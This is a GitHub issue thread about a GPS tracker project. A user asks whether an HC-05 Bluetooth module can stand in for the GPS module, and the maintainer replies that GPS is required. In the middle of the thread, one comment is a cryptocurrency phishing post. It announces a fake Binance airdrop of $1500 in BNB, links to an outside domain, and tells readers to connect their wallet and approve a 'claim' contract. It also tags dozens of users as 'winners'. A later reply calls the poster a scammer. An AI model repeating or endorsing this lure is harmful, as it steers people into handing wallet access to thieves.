### ISSUE TITLE
Inquiry about replacing GPS Module with HC-05 Bluetooth Module

### ISSUE THREAD

**Issue by rachelannmathews1998** [seeya/gpstracker#1]
Hi there, 
I want to do a similar project where I have my live location constantly updated when a request is sent in, however I have a bluetooth module attached to my project.
Do you know if I can transmit live location and carry out/use the same telegram bot with a HC-05 Bluetooth module instead?
Or would I have to use a GPS Module strictly.

Thank you so much!

**Comment by seeya** [comment]
You'll have to use a GPS Module to retrieve location data.

**Comment by mohamedSalehHegazy** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @Midhunmr7, @MikeyCarter, @shinny-xuyida, @lyndonm, @2770862886, @JasXSL, @andrewfurey21, @lirui2018, @raijintl1, @developit, @ClaudioG0, @TimOliver, @omhmichaels, @chengweiv5, @daidai21, @pipepi, @phocks, @akopcz2, @frrf, @Roki100, @Daudbpp2021, @vovan87, @TundeOsho, @cowlicks, @johinsDev, @m5rc238, @tchdjddj75, @dragonfire1119, @psilva999, @marstensid, @Amantini1997, @morlofff, @tealethetoolman, @jahvonnereid, @richiesuper, @Juandavi1, @tutv, @sudotty, @dkarter, @thowitz, @Sofia2933, @perfaram, @bitm4ster, @zainamroti, @npm-ued, @DewenHona, @deepu14168, @havanthanhit, @Aminlassal99, @mlebrasseur

**Comment by TundeOsho** [comment]
Scammer

**Comment by TundeOsho** [comment]
Beware. He's a scammer

**Comment by TundeOsho** [comment]
Can you please remove me from your mailing list?

Regards,
*Osho Akintunde*
